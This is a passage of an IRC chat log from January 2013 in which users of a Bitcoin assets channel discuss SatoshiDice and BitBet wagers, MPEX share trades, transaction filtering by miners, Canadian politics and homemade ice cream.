work, especialy if its womens playing Jan 08 07:41:54 14th to 27th january australian open, but idk if you want too many sport bets Jan 08 07:42:03 will get the interest of mp Jan 08 07:43:14 from what I see sport bets work better than those sily bets ;) Jan 08 07:43:41 ya lots of bets on the NFL Jan 08 07:43:56 perhaps tennis will get some traction too Jan 08 07:44:00 honestly dunno Jan 08 07:44:08 yeah tennis is nice to bet on Jan 08 07:44:32 only two outcomes, not like football Jan 08 07:44:39 :) Jan 08 07:47:10 but idk how that works out with weigthed bets Jan 08 07:47:25 sub obtimally i guess Jan 08 07:47:39 this weight system is getting reviewed Jan 08 07:48:12 you just bet on both and trade on sport betting sites :P Jan 08 07:49:32 Bugpowder they changed the lucky number thing for better dispersion Jan 08 07:49:39 i think the swings are a thing of the past. Jan 08 07:50:15 yes Jan 08 07:50:36 glad they raised max bet to compensate Jan 08 07:50:46 actually Jan 08 07:50:54 I think you can still get some wild swings Jan 08 07:51:16 max swing was around 1333 / bet Jan 08 07:51:33 when they rolled like a 60000 Jan 08 07:51:48 or a <2000 Jan 08 07:52:00 well you can still bet on under 2 right ? Jan 08 07:52:05 yeah Jan 08 07:52:07 so 64x 500 = 12k ? Jan 08 07:52:19 probably the variance goes down about 2-3x Jan 08 07:52:58 414 max at < 1600 is pretty big number Jan 08 07:53:04 414 max at < 16000 is pretty big number Jan 08 07:53:14 1242 Jan 08 07:53:20 net gain Jan 08 07:53:30 sheeit Jan 08 07:53:59 heh Jan 08 07:54:08 its the only place with a bankroll big enough for whales Jan 08 07:54:13 they have no other place to bet Jan 08 07:54:17 the rich get richer! Jan 08 07:55:11 Nice! Somebody bet some more coin on NFL. http://bitbet.us/bet/49/ Jan 08 07:55:22 its the only place with a bankroll big enough for whales << that's what i do. Jan 08 07:55:59 only dice site Jan 08 07:56:29 if you look for ltc dices, the biggest one accepts 50 LTC lol. Jan 08 07:56:57 max bet Jan 08 07:57:37 I really set the hook in my friend last night. Now he's thinking of rolling his 401k into self-directed IRA and putting it in bitcoins :) Jan 08 07:57:56 lol mh Jan 08 07:59:04 hahaah Jan 08 07:59:45 tho it'd prolly be best if he put half of it Jan 08 07:59:48 a third of it Jan 08 07:59:49 something. Jan 08 08:00:13 the rationale being that 100k put into btc now will make you "just as rich" as 300k put into btc now. Jan 08 08:00:14 you can burn your fingers with bitcoin, if you buying them with hard earned money Jan 08 08:00:21 on the other hand, losing all your money is not the same as losing a third. Jan 08 08:01:03 [MPEX] [S.DICE] 712 @ 0.00471893 = 3.3599 BTC [+] Jan 08 08:02:08 Confirmed total: 263 BTC Jan 08 08:02:13 this srsly isn't bad. Jan 08 08:05:25 [MPEX] [S.MPOE] 12700 @ 0.00063621 = 8.0799 BTC [-] Jan 08 08:07:07 off i go Jan 08 08:07:08 nite Jan 08 08:07:17 night Jan 08 08:08:17 If he puts it in SD, might not be such a bad deal. SD will probably remain a major Bitcoin betting site for a long time. Jan 08 08:08:35 Hmm... people are really overbidding on BBET. Jan 08 08:08:55 Where will be the cheap blocks D= Jan 08 08:10:19 and who buys 1.8 million BBET =P Jan 08 08:10:38 At that price... Jan 08 08:11:19 not the bidder Jan 08 08:11:34 math don't work rite Jan 08 08:11:59 In S.DICE* Jan 08 08:12:51 yeah Jan 08 08:13:00 I think he will not roll it all in Jan 08 08:13:12 probably just put $500 / mo in Jan 08 08:13:34 At that price for BBET, 10 million would cost 2775 BTC. BBET would need to get 277 500 BTC in bets to get that back in fees for dividends... Jan 08 08:13:38 Damn... Jan 08 08:13:58 Over the course of its existence Jan 08 08:14:04 at the rate it;s going atm, it will do that in ~10 years Jan 08 08:14:09 not counting advertising revenue Jan 08 08:14:21 o im sorry. 1000 days not 10 years. 3 years. Jan 08 08:14:34 Man, my matlab bet optimizer doesn't handle the time decay Jan 08 08:14:39 Hmm, still quite some time. Jan 08 08:14:47 Advertising revenue eh? Jan 08 08:14:57 this discussion reminds me of s.dice cca august. Jan 08 08:15:06 and what happens if the bitcoin price in dollar rises? price of the stock goes down? Jan 08 08:15:11 Maybe either BitVPS or Namworld could sponsor an ad on BBET. Jan 08 08:15:17 Dr-X hasn't happened to far. Jan 08 08:15:32 s,mpoe went up like 3000% while the btc went up like 300% in dollars. Jan 08 08:15:46 Namworld not a bad idea. it's a pay as much as you want 30 days rotator deal. Jan 08 08:15:48 hm ok ;) Jan 08 08:15:59 Interesting. Jan 08 08:16:03 so you're rich now, congratz :D Jan 08 08:16:05 Dr-X they're purely btc businesses. the dollar don't enter into it. Jan 08 08:16:39 People seem to bet just as much BTC when it's 1$ per BTC or if it's 20$ per BTC Jan 08 08:16:50 They just bet it. Jan 08 08:17:03 If I have 50 BTC and my goal is more money and more BTC what do I do? Jan 08 08:17:47 ;;ticker Jan 08 08:17:47 Buy some S.DICE Jan 08 08:17:57 BREAKOUT Jan 08 08:17:59 or something like that. Jan 08 08:18:05 ;;ticker Jan 08 08:18:14 BREAKOUT: Gribble Edition Jan 08 08:18:19 BTCUSD ticker | Best bid: 13.68386, Best ask: 13.81000, Bid-ask spread: 0.12614, Last trade: 13.81000, 24 hour volume: 41310.15984901, 24 hour low: 13.40400, 24 hour high: 13.81000, 24 hour vwap: 13.59046 Jan 08 08:18:53 yeah, but my fear is that the price of the share will go down, when the price per btc goes up Jan 08 08:19:28 Hmm, than that makes it more USD safe, but you'd earn less if BTC prices rise. Jan 08 08:20:06 how do value a company, it is worth 500k btc and 6,500,000 dollar (easier to calculate) Jan 08 08:20:36 It had $230,000 in profit last month Jan 08 08:20:44 PROFIT Jan 08 08:20:44 Well I guess you'd value it on revenue. Jan 08 08:20:48 [MPEX] [S.DICE] 750 @ 0.00474805 = 3.561 BTC [+] Jan 08 08:20:50 [MPEX] [S.DICE] 1350 @ 0.00476255 = 6.4294 BTC [+] Jan 08 08:21:07 no growth assumed when the price per btc doubles it will be worth 250k btc and 6,500,000 dollarz? Jan 08 08:21:17 i wonder how many irl businesses are still making profit Jan 08 08:21:20 bitcoin prices went up Jan 08 08:21:23 not ebidta bs window washing Jan 08 08:21:27 volume went up Jan 08 08:21:31 mircea, most of them? Jan 08 08:21:37 Namworld i doubt it. Jan 08 08:21:44 5th year of worldwide recession Jan 08 08:21:49 mircea_popescu IRL corporations are actually making shitloads right now Jan 08 08:21:50 At least when excluding small businesses Jan 08 08:21:54 i'd be surprised if there's a thousand left. Jan 08 08:21:58 CMI Jan 08 08:22:22 Corp balanace sheets are basically all time healthiest Jan 08 08:22:23 I'd be surprised if there was less than a million left... Jan 08 08:22:42 Bugpowder not if you properly account for the currency risk Jan 08 08:22:42 except those with financial exposure Jan 08 08:22:42 financials Jan 08 08:22:46 lol Jan 08 08:22:48 >D Jan 08 08:22:53 they do too, bank stocks are the best right now Jan 08 08:23:13 The banks are all bankrupt Jan 08 08:23:18 We're not in a catastrophic recession. Many businesses cut jobs or make less profits. Jan 08 08:23:30 but... they probably won't fail Jan 08 08:23:40 and that pretty much says the whole story. Jan 08 08:23:42 But most shops, corp, etc you see all around still make a profit. Jan 08 08:23:47 SP500 earnings are very very high right now Jan 08 08:23:48 no, they won't fail, they just poison the economy with worthless receipts Jan 08 08:23:51 pirate style. Jan 08 08:23:52 very efficient Jan 08 08:23:54 no they're not bankrupt, they have a shitload of own equity Jan 08 08:24:16 basically this is exactly btc economy cca july : everyone's balance sheets were all time flush with cash Jan 08 08:24:18 the banks have a shitload of bad loans that are not being marked to market Jan 08 08:24:19 except not really. Jan 08 08:24:31 although much has be given to fed at par Jan 08 08:24:35 as collatoral Jan 08 08:24:41 plenty of dead walking, and it's impossible not to do business with them Jan 08 08:24:49 i mean, i could do it in btc, cause it's small and people are idiots Jan 08 08:24:57 irl i couldn't do it, and so i assume nobody else can either. Jan 08 08:25:02 Dude, China is still growing at 7% Jan 08 08:25:05 pff. Jan 08 08:25:10 you are way to pessimistic Jan 08 08:25:16 the news i see from china are pretty bad. Jan 08 08:25:18 on global corp health Jan 08 08:25:26 they're getting riots almost on par with the us by now. Jan 08 08:25:26 good fiat economy is bad for him :P Jan 08 08:26:13 But in Canada everything is fine. Jan 08 08:26:34 Dr-X thing is i was of the same persuasion before discovering btc. Jan 08 08:27:10 http://www.multpl.com Jan 08 08:27:21 US? Jan 08 08:27:24 riots? Jan 08 08:27:26 where? Jan 08 08:27:26 some bets on satoshi show up 3 times in recent Jan 08 08:28:36 Everything is always fine in Canada... nothing much happening. Just people saying "Eh?" all the time and mooses. Jan 08 08:30:36 isn't it meece ? Jan 08 08:31:28 Bugpowder occupy movements, whatever. Jan 08 08:32:56 [MPEX] [S.DICE] 4000 @ 0.00471893 = 18.8757 BTC [-] Jan 08 08:33:43 Compared to the race riots of the 60s and 70s, I think we are doing pretty damn well Jan 08 08:34:15 [MPEX] [S.DICE] 1838 @ 0.00471893 = 8.6734 BTC [-] Jan 08 08:34:17 [MPEX] [S.DICE] 162 @ 0.00469917 = 0.7613 BTC [-] Jan 08 08:34:21 Whole Foods opening stores in downtown Detroit yo Jan 08 08:34:26 lol Jan 08 08:34:47 i didn't mean the us is particularly turmoily Jan 08 08:34:56 i meant that it's outrageous for china Jan 08 08:35:55 China doing pretty well compared to 70s as well Jan 08 08:37:28 not really. Jan 08 08:37:30 back then they were poor. Jan 08 08:37:33 they had no alternative. Jan 08 08:40:15 [MPEX] [S.MPOE] 10020 @ 0.0006352 = 6.3647 BTC [-] Jan 08 08:40:16 [MPEX] [S.MPOE] 11600 @ 0.00063517 = 7.368 BTC [-] Jan 08 08:40:18 [MPEX] [S.MPOE] 10200 @ 0.00063412 = 6.468 BTC [-] Jan 08 08:40:19 [MPEX] [S.MPOE] 280 @ 0.00063358 = 0.1774 BTC [-] Jan 08 08:43:16 [MPEX] [S.MPOE] 14352 @ 0.00063358 = 9.0931 BTC [-] Jan 08 08:43:24 Possible, my english might not be that good. Jan 08 08:49:52 Canada is not fine. The moron voting public voted in Harper based on promises of infrastructure investment which haven't materialized, and now we have a rapidly deteriorating legislature which consists of a bunch of idealogical idiots essentially ignoring the entire canadian public and dismantling some of our most cherished institutions and rights. Jan 08 08:50:25 lol i was waiting for this Jan 08 08:50:26 Meanwhile, their own f*cking MPs are DM'ing people like myself and mocking us because we said they were going to be toast in the next election. Jan 08 08:50:36 midnightmagic, go make a bet! --> http://bitbet.us Jan 08 08:50:37 [MPEX] [S.DICE] 800 @ 0.00469917 = 3.7593 BTC [-] Jan 08 08:50:40 "our" own MPs. Jan 08 08:51:12 I no longer have confidence, since making that statement, that my fellow voters are capable of a rational voting decision. Jan 08 08:51:28 voters never are and never were capable of rational decision. that's not how voting works. Jan 08 08:51:36 ^^^^ Jan 08 08:51:57 baaaaaa. Jan 08 08:52:11 It has in the past. Additionally, at least some people are voting with their ideals because Elizabeth May made it in. Jan 08 08:52:15 for that matter, women don't pick men rationally either. Jan 08 08:52:30 now there's a true f'ing statement if i ever heard one. Jan 08 08:52:55 voting is just a cheap method of statistically obtaining a call from the multitude. Jan 08 08:52:58 people usually vote their wallets, and additionally always pick the precived winner before hand. voters don't like to vote for a loser, even if that candidate is more closely aligned with their political philosiphies. Jan 08 08:53:15 Here, each vote *used* to deliver some small amount of federal funding to the party voted for as a way of fostering independent third parties. Jan 08 08:53:15 it's not rational, it's quite the opposite. but it has a historical record of conservation success. Jan 08 08:53:41 mod6: Apparently some of us do like to vote for a loser. Elizabeth May is in office. :) Jan 08 08:53:50 HEHEH Jan 08 08:53:56 now i have to look up who that is Jan 08 08:54:21 I saw her grand-daughters bare ass at a dinner once. she was wearing a mini-skirt and kept hugging people taller than she is. Jan 08 08:54:36 (highschool grad) Jan 08 08:54:43 Super uncomfortable dinner. Jan 08 08:54:47 why lol Jan 08 08:54:50 HAHAH Jan 08 08:55:10 Why was it uncomfortable? Jan 08 08:56:09 sure. you can't eat with women you've seen the ass of ? Jan 08 08:56:25 Bare asses of unknown other people mean bare asses are sitting on the seats I sit in. It reminded me of how unhygienic being out for dinner is and I like to suspend my disbelief for a little while. Jan 08 08:57:07 Also it was classless for the grand-daughter of the leader of one of the main political parties in Canada to dress like that. Jan 08 08:57:12 seriously!? Jan 08 08:57:25 she's a teen! she's supposed to go around barebutt Jan 08 08:57:33 haha, wow. i probably wouldt have given it a second thought. i must be a savage. Jan 08 08:58:23 It either meant she was conscious of her dress choice, or not. If she wasn't, then it was uncomfortable watching her accidentally and apparently unconciously bare her ass seven or eight times. Jan 08 08:58:35 lol Jan 08 08:59:26 people are just attention whores these das. Jan 08 08:59:29 *days Jan 08 08:59:35 you actually care tghat you're sitting where some other chick sat ?! Jan 08 08:59:35 If she was, then.. why? Who's her audience? A bunch of stuffy people at a calm atmosphere restaurant where people are coming in from the cold (it was damn cold) and eating soup in their flannels? Jan 08 08:59:39 lol Jan 08 09:00:12 her audience is simply the world. she's not old enough to know y'all aren't worth the trouble yet. Jan 08 09:00:16 you should be flattered. Jan 08 09:00:20 Meanwhile, it was like none of the rest of her family noticed that they were making everyone uncomfortable. Jan 08 09:00:28 Yeah, in that sense it was f'ing awesome. Jan 08 09:00:59 And in the sense that the leader of some political party has raised a family to be essentially unfettered, dress-wise. Jan 08 09:01:05 That I appreciated. Jan 08 09:01:12 Well, does anyone remember the bush daughters? LOL Jan 08 09:01:24 Were they all racy too? Jan 08 09:01:30 omg Jan 08 09:01:30 I don't remember them so much.. Jan 08 09:01:38 lmao Jan 08 09:01:57 lol Jan 08 09:02:07 one of them took off her underwear in public once Jan 08 09:02:10 put something else on Jan 08 09:02:34 whoah Jan 08 09:02:43 classless lol. Jan 08 09:02:50 you live in the colonies. what class ? Jan 08 09:03:33 Ever been to Canada? Jan 08 09:04:03 for about two hours once, off nh Jan 08 09:04:38 :P Jan 08 09:04:47 i was jus' ribbin ye a little. Jan 08 09:04:48 so, quiet, you and your colonies references. Jan 08 09:04:58 i know Jan 08 09:04:59 im sure canada is just as classless as the rest of the world, that's what we have the internet for Jan 08 09:05:07 ^^ that Jan 08 09:05:09 classlessness uniformity. Jan 08 09:05:30 people used to punch out other people for being classless. manners made it around pretty good. Jan 08 09:05:58 nobody punched anybody over class lol. at most they furrowed their brows and whined privately. Jan 08 09:06:38 no way. Not much earlier than my grandfather's era, ignoring someone who said hello to you was a punch-out-able offence. Jan 08 09:08:05 but going around punching people is not too classy now is it. Jan 08 09:08:17 [MPEX] [S.DICE] 1700 @ 0.00476255 = 8.0963 BTC [+] Jan 08 09:08:30 Sure. People were admired for their fists. Jan 08 09:08:48 Righteous fisticuffs. Jan 08 09:09:03 i guess if you can't afford a rapier or w/e Jan 08 09:09:56 right. black eyes heal. Put the boxing gloves on and get your differences out in the open. Did you ever see the Mickey Mouse club episodes where they put two fighting boys in the ring together and let them duke it out? Jan 08 09:10:54 i never saw mickey mouse club at all Jan 08 09:11:07 I was wide-eyed shocked when I saw that. Jan 08 09:11:13 but i know i resented at that age the implication of equality in this method Jan 08 09:11:19 And then my dad started telling me stories of grandpa.. :) Jan 08 09:11:22 i always had my differences resolved by overwhelming forcve. Jan 08 09:11:39 different times man Jan 08 09:11:49 i guess so Jan 08 09:13:23 mircea_popescu: So! Got anything you're actively ranting about lately? Jan 08 09:13:58 http://trilema.com/2013/whats-a-rogue-state/ like ? Jan 08 09:14:10 Bitcoin-related? Jan 08 09:15:52 http://trilema.com/2013/the-question-of-the-year-in-btc/ ok try that then Jan 08 09:18:39 Woops, "begging the question" doesn't mean "raising the question". Jan 08 09:19:07 lol Jan 08 09:22:03 geh.. Voorhees is such a weird gonzo Jan 08 09:22:33 lol ? Jan 08 09:23:10 We'll see what happens to sdice when asic are delivered.. :-) Jan 08 09:23:20 there's a relation ? Jan 08 09:23:30 I hope so! Jan 08 09:23:36 Future-tense. Jan 08 09:23:43 what'd it be ? Jan 08 09:24:14 http://bitbet.us/bet/40/ btw. Jan 08 09:24:31 Redistribution of hashrate, in some cases to people who care what happens with the blockchain. Jan 08 09:25:24 lol Jan 08 09:25:31 im not too concerned about miners deciding to ruin bitcoin. Jan 08 09:25:46 Not ruin it. Jan 08 09:26:17 its kinda like rg said once, if bitcoin can't handle the tx's from SD, then we should pack up and shut off the lights now. Jan 08 09:26:29 the moment bitcoin is not transaction agnostic it might as well be dead. Jan 08 09:26:32 but... that doesn't mean there couldn't be a better way to do it either. Jan 08 09:26:36 who do you think wants to ask miners' permission ? Jan 08 09:26:36 but sdice operates inside the txn space, which makes it easy to filter. If they operated the way everyone else normal does, and stopped doing those stupid micro-txn, then meh. Jan 08 09:27:03 [MPEX] [S.DICE] 300 @ 0.00476255 = 1.4288 BTC [+] Jan 08 09:27:04 [MPEX] [S.DICE] 700 @ 0.0047638 = 3.3347 BTC [+] Jan 08 09:27:05 [MPEX] [S.DICE] 1159 @ 0.00476484 = 5.5224 BTC [+] Jan 08 09:27:06 it can. but there isn't enough incentive due to concentration of txn value. also, rg isn't really much of an authority :) Jan 08 09:27:06 [MPEX] [S.DICE] 1841 @ 0.00477167 = 8.7846 BTC [+] Jan 08 09:27:30 midnightmagic: no. but he said it, and I agree :) Jan 08 09:27:31 this is just posturing on the strength of the block reward being still large-ish Jan 08 09:27:47 just giving credit where due, etc. Jan 08 09:28:08 mircea_popescu: the value of keeping sdice txn in the blockchain is less than the value of keeping diffuse txn in the blockchain, including mixnets btw. Jan 08 09:28:31 and miners are the ones who set fee structures. Jan 08 09:28:35 this is a moot question Jan 08 09:28:41 that is part of the whole nature of bitcoin. Jan 08 09:28:43 nobody's to evaluate the value of keeping a tx in the blockchain Jan 08 09:28:48 other than the issuer of the tx. Jan 08 09:29:08 miners stick with this or get lost. Jan 08 09:29:17 that's not true. :) Jan 08 09:29:23 hey, it's the exact standard Jan 08 09:29:39 but you're welcome to establish it through experience if simple theory doesn't cut it for ya. Jan 08 09:29:53 the exact standard has fees, and the code has anti-dust-spam exceptions in it. satoshi foresaw operations like sdice. Jan 08 09:29:59 *whew* almost forgot that mtdew in the freezer Jan 08 09:29:59 hah, lol. Jan 08 09:30:23 i guess at some point the split between the people who matter and the people who think they know better is inevitable Jan 08 09:30:43 contrary to what the people who think they know better think, their fall into oblivion will be immediate. Jan 08 09:31:04 let other people who don't care, mine sdice txn, and take the hit to block propagation. the incentive is against including sdice txn in the blockchain. Jan 08 09:31:15 yeah, i guess time will tell. Jan 08 09:31:32 the incentive really is against including miners who don't ihnclude transactions into bitcoin. Jan 08 09:31:53 that's not true. even miners who do *no* txn in their blocks are still burying txn in work. Jan 08 09:32:11 they're still securing the blockchain. Jan 08 09:32:15 [MPEX] [S.DICE] 550 @ 0.00477167 = 2.6244 BTC [+] Jan 08 09:32:28 you'll at some point have to come to terms with the cold reality that about half of bitcoin's utility atm is s.dice Jan 08 09:32:48 i know you like bitcoin in principle. but in practical terms, it's useless other than because its that thing where sdice happens. Jan 08 09:33:26 "not including" the filling in the donut is pracrtically speaking not including yourself among the donut makers. Jan 08 09:33:32 because donuts WILL be made. Jan 08 09:34:01 lol hilarious analogy. But! Are they Tim Horton's doughnuts, or Krispy Kremes? Jan 08 09:34:14 apparently they're E Vor Hee's Jan 08 09:34:25 man fuck that guy.. lol Jan 08 09:35:35 he's amusing to me because looky here : the consensus was that mining corps are the big deal. Jan 08 09:35:47 out of nowhere comes this dood, and suddenly his corp is larger than all the asic producers together Jan 08 09:35:53 and makes more revenue to boot. Jan 08 09:35:58 it was? Jan 08 09:36:05 completely blindsides market, it's hysterical to watch reactions etc. Jan 08 09:36:33 well yes it was. glbse practically consisted of pirate passthroughs and mining farms. Jan 08 09:36:40 good lord no. ASIC producers are internally parasitic. The value derives from a parasitic self-consumption of economic worth. Jan 08 09:37:18 the what ?! Jan 08 09:38:27 [MPEX] [S.DICE] 3700 @ 0.00477167 = 17.6552 BTC [+] Jan 08 09:39:17 hmmm Jan 08 09:40:06 Ah, that's not consensus. Jan 08 09:40:36 mh Jan 08 09:40:54 The what what..? Jan 08 09:41:30 i dunnop lol Jan 08 09:41:33 The value of mining is a finite value and can't exceed some fraction of the value of the bitcoin economy.. Jan 08 09:41:48 right. Jan 08 09:41:53 It's cannibalizing some of its own worth in order to secure itself. Jan 08 09:42:48 "securing itself" includes disincentivizing b-s like the DDoS that sdice is. :-) Jan 08 09:42:58 imo.. Jan 08 09:43:12 nah, asic (real asic) is actual research. Jan 08 09:43:26 the bs going on currently is cannibalizing some of btc's perception for private gain Jan 08 09:43:44 sorta like someone selling haagen dasz icecream made in nj as "classy" yurpean stuff. Jan 08 09:44:11 the funding for the research can't happen if selling bitcoin rewards doesn't support it though.. Jan 08 09:44:26 yeah i don't understand that. there's a simple metric to finding the best ice cream in a store.. Jan 08 09:44:39 weigh it and calculate density. Jan 08 09:44:43 sure it can. research that's not justified economically happens all the time Jan 08 09:44:49 it's what research actually is, for that matter. Jan 08 09:45:01 ah, usually that's publically-funded though. Jan 08 09:45:09 s/usually/often/ Jan 08 09:45:12 lol: (23:44) < midnightmagic> weigh it and calculate density. <<< don't you just go by flavor? Jan 08 09:45:23 mod6: that comes next. Jan 08 09:45:31 oh. Jan 08 09:45:34 srry. Jan 08 09:45:42 mod6: And no, I refuse to buy whipped-air ice cream. It's inferior quality. Jan 08 09:46:09 mod6: Notice they sell ice cream by volume. Which really cheeses me off. But the denser it is, the more cream:air ratio it has. Jan 08 09:46:27 you ever been to europe ? Jan 08 09:46:32 who me? Jan 08 09:47:10 I've always wanted to. Jan 08 09:47:24 yeah well, that's the icecream metric. Jan 08 09:47:42 have some proper gelato. Jan 08 09:47:51 I've had proper gelato. Jan 08 09:48:09 thats like an ICEE right? Jan 08 09:48:19 I make ice cream; I used to sell it by the tonne. 1 metric tonne every two weeks or so. Jan 08 09:48:24 Scopped out into cones.. Jan 08 09:48:42 you make 1 metric ton of icecream per week? Jan 08 09:48:50 err two weeks?! Jan 08 09:48:57 oh ok then Jan 08 09:48:59 hahah, do you run a ice cream parlor? Jan 08 09:49:01 makomk malaimo markedathome|wth maximian midnightmagic MiningBuddy mircea_popescu mod6 Jan 08 09:49:01 makomk malaimo markedathome|wth maximian midnightmagic MiningBuddy mircea_popescu mod6 Jan 08 09:49:06 No, I sold 1 metric tonne of ice cream every two weeks, scooped out by myself. I was very young. Jan 08 09:49:09 by volume Jan 08 09:49:26 I make my own ice cream because so much of it sucks in the stores and nobody knows any different. Jan 08 09:49:32 wow Jan 08 09:49:46 i used to be a fax server when i was young Jan 08 09:49:53 home made icecream is better if i recall, i haven't had it in about 25 years. Jan 08 09:50:01 lol pigeons Jan 08 09:50:04 lol awesome Jan 08 09:50:08 [MPEX] [S.DICE] 3850 @ 0.00469917 = 18.0918 BTC [-] Jan 08 09:50:50 mircea_popescu: In the big 20L containers, if there's air in there it melts more rapidly and nobody will buy it. Jan 08 09:51:05 i miss access to those things. they're really great for berry picking. Jan 08 09:51:20 lol this guy's a bear. Jan 08 09:51:30 on the internet nobody knows. except one can guess. Jan 08 09:51:38 im like O.o Jan 08 09:52:01 this guy picks berries, makes 2 ton vats of ice cream and still finds time to hang in -assets! Jan 08 09:52:13 lol no, when I was younger. Jan 08 09:52:13 you forgot highschooler butt Jan 08 09:52:19 hahah Jan 08 09:52:21 well that was just a few months ago. Jan 08 09:53:20 when you were also younger Jan 08 09:53:29 technically i guess. Jan 08 09:53:57 mod6: You don't pick berries? Jan 08 09:54:48 well, actually, this year I did for the first time in many years. I was just thinking about that... kinda nice and quiet -- except for the damn bees. Jan 08 09:54:49 i don't think it's legal in his country Jan 08 09:55:09 :) I knew it. Jan 08 09:55:22 I had a female prodding me to leave the house/computer and do some berry picking. worked out well, got some nice ones. Jan 08 09:55:53 i did my best to look like i was enjoying myself actually. Jan 08 09:56:03 mircea_popescu: You should come out and pick berries with me. It's like meditating, and at the end we make pie. Jan 08 09:56:32 maybe after the collapse of the us i visit that corner of the world again Jan 08 09:56:36 [MPEX] [S.DICE] 2038 @ 0.00469917 = 9.5769 BTC [-] Jan 08 09:56:38 [MPEX] [S.DICE] 962 @ 0.00468133 = 4.5034 BTC [-] Jan 08 09:57:13 Yeah. I'm hoping that comes soon, because shit is way too far out of wack over here. Jan 08 09:58:52 decade-ish Jan 08 09:58:57 It's hard to enjoy anything these days. Songs on the radio, tv shows, holidays... all seem to be overshaowed by the darkining war clouds. Jan 08 09:59:01 mod6: You sound like maybe you're east-coast? Jan 08 09:59:18 na. i hate the east coast. Jan 08 09:59:26 no offense east coast! lo Jan 08 09:59:27 l Jan 08 09:59:46 but im from Minnesota, and I spent a large amount of time in Arizona. Jan 08 09:59:48 mod6: Aw. I was going to ask if you've seen any wintergreens the last few years. I remember them being exceedingly rare. Jan 08 10:00:28 Hmm, not sure what those are. Jan 08 10:00:41 mod6: Ever had wint-o-green lifesavers? Jan 08 10:00:57 I've been to the east coast a number of times. The only thing I learned while there is everyone is a larger asshole than back home, and no one stops for red lights. Jan 08 10:01:21 Oh, yeah. Those are good. :) Jan 08 10:02:04 mod6: That's a little like what the berries taste like. Jan 08 10:02:55 ohh right on. here I just picked some rasberries. the apples wernt ready sadly. Jan 08 10:03:04 http://en.wikipedia.org/wiki/Wintergreen Jan 08 10:03:20 very very rare, they grow at the base of certain trees. Jan 08 10:04:00 Wow, I had no idea. Jan 08 10:04:05 Check this out: During the American Revolution, wintergreen leaves were used as a substitute for tea, which was scarce. Jan 08 10:04:16 cool. Jan 08 10:05:30 picking berries on the east coast: http://en.wikipedia.org/wiki/Black_drink Jan 08 10:05:32 delicious. if you ever get a chance, try one or two of the berries. transcendent flavour experience. :) Jan 08 10:10:40 [MPEX] [S.DICE] 600 @ 0.00475368 = 2.8522 BTC [+] Jan 08 10:14:05 this thing says its posion lol Jan 08 10:14:05 Danger: Jan 08 10:14:06 Parts of plant are poisonous if ingested Jan 08 10:16:05 One thing that I like about Canada: Formitable Hockey Players. Jan 08 10:16:35 Every now and then I would have to travel to winnepeg to play the teams up there. Those guys were huge and almost as mean as me. Jan 08 10:17:05 Always seems like the american teams we played were some real candyasses. **** BEGIN LOGGING AT Tue Jan 8 16:42:14 2013 Jan 08 16:42:37 ahh so what's new Jan 08 16:44:52 hi, brendio surfaced Jan 08 16:46:06 o that's good Jan 08 16:50:32 [MPEX] [S.DICE] 900 @ 0.00464179 = 4.1776 BTC [+] Jan 08 16:52:49 oh, and if anyone prefers to claim BIB.BVPS via coinbr, let yourself be heard: https://bitcointalk.org/index.php?topic=87358.20;topicseen Jan 08 16:56:49 that's even better. Jan 08 16:57:00 ;;later tell namjies oh, and if anyone prefers to claim BIB.BVPS via coinbr, let yourself be heard: https://bitcointalk.org/index.php?topic=87358.20;topicseen Jan 08 16:57:01 The operation succeeded. Jan 08 17:00:16 [MPEX] [S.DICE] 196 @ 0.00464179 = 0.9098 BTC [+] Jan 08 17:00:18 [MPEX] [S.DICE] 250 @ 0.00467175 = 1.1679 BTC [+] Jan 08 17:00:19 [MPEX] [S.DICE] 2000 @ 0.00467883 = 9.3577 BTC [+] Jan 08 17:00:19 [MPEX] [S.DICE] 811 @ 0.00468254 = 3.7975 BTC [+] Jan 08 17:00:27 ;;ticker Jan 08 17:00:27 BTCUSD ticker | Best bid: 13.73336, Best ask: 13.76960, Bid-ask spread: 0.03624, Last trade: 13.75950, 24 hour volume: 46393.77110328, 24 hour low: 13.40403, 24 hour high: 13.83000, 24 hour vwap: 13.62512 Jan 08 17:00:30 o hey. Jan 08 17:03:37 hey mircea_popescu why dont bitbet just show how much the winning ratio for each bet is Jan 08 17:03:48 doesn't it ? Jan 08 17:04:03 Weighted No: 534`511 Jan 08 17:04:03 Weighted Yes: 793`307 Jan 08 17:04:07 how the duck i decipher this? Jan 08 17:04:13 but that's exactly what a ratio is neh ? Jan 08 17:04:22 ;;calc 534511 / 793307 Jan 08 17:04:23 0.673775726169 Jan 08 17:04:35 well maybe it should show that on the page, too.. Jan 08 17:04:45 i've got no idea what i win if i bet 1 btc on a bet Jan 08 17:04:49 if it shows info like Weighted No: 534`511 Jan 08 17:04:49 Weighted Yes: 793`307 Jan 08 17:04:51 that's an idea Jan 08 17:06:23 [MPEX] [S.MPOE] 7200 @ 0.00064571 = 4.6491 BTC [+] Jan 08 17:06:58 https://www.ultimafund.com/ Jan 08 17:08:46 Welcome, Dear Investor! Jan 08 17:08:55 I am MAria Jan 08 17:08:59 Please to loved you. Jan 08 17:09:26 Yearly return: -21.90% Jan 08 17:09:28 sweet Jan 08 17:09:41 liek, better than btcjam, 78.1% Jan 08 17:09:51 MOAR THAN MARKET of 77.whatever thefuck it was Jan 08 17:09:58 [MPEX] [S.MPOE] 11400 @ 0.00064553 = 7.359 BTC [-] Jan 08 17:10:08 That fund is not investing well Jan 08 17:10:25 don't be a hater nao Jan 08 17:10:28 Nov 28 share price 0.88, Today 0.92 Jan 08 17:11:07 Fund size: 2092.05 BTC Jan 08 17:11:07 Deposit fee: 3.00% Jan 08 17:11:07 Profit fee: 10.00% Jan 08 17:11:08 holy shit Jan 08 17:11:10 See we're not a ponzi! Jan 08 17:11:15 dude Jan 08 17:11:17 My 'fund' share price Nov. 28 = 0.782 Jan 08 17:11:22 i should start a fund doing 3% off the top and 10% profit. Jan 08 17:11:37 My 'fund' share price today = 1.094 Jan 08 17:11:44 who is giving him money? I doubt anyone Jan 08 17:11:46 I take 2/10 Jan 08 17:11:50 ya but you have a gf Jan 08 17:12:07 most hedge funds are 2 & 20 Jan 08 17:12:18 ya but they ALSO have gfs. Jan 08 17:12:28 what is a gf? Jan 08 17:12:32 girlfriend Jan 08 17:12:47 im not paying someone with no track record 3%, 2% or any %. Jan 08 17:12:55 lol Jan 08 17:12:58 yeah Jan 08 17:13:00 profit only for him. Jan 08 17:13:22 I would rather invest by myself Jan 08 17:13:23 He should start a S.DICE passthrough Jan 08 17:13:38 but 3/10 is not obscene, if he was running a decent fund Jan 08 17:13:56 if he was somebody it would be obscene Jan 08 17:14:01 as in, 